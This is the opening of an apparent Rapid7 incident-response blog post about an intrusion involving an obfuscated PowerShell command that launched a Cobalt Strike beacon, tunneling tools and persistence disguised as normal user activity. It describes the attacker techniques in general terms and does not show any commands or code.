Innovative Tunnelling And Forensic Tool Abuse: IR Tales From The Field
Rapid7, Tuesday, June 17th, 2025
Rapid7's Incident Response (IR) team was engaged to investigate an incident involving an attempted Cobalt Strike execution. The investigation uncovered twists and turns with pre-ransomware activities, tunneling tools, and attackers taking a page out of the defender's playbook.
The attacker took careful steps to maintain access to the environment through persistence that mimicked normal user behavior. This blog covers the techniques, indicators of compromise (IoCs), and detections for Rapid7 customers.
Observed attacker behavior
In this incident, the attacker executed an elegantly obfuscated PowerShell command to establish a Cobalt Strike beacon. Cobalt Strike (CS) is often used after an attacker has gained a comfortable foothold in an environment; CS is a powerful and dynamic tool useful for maintaining persistent access and executing commands remotely.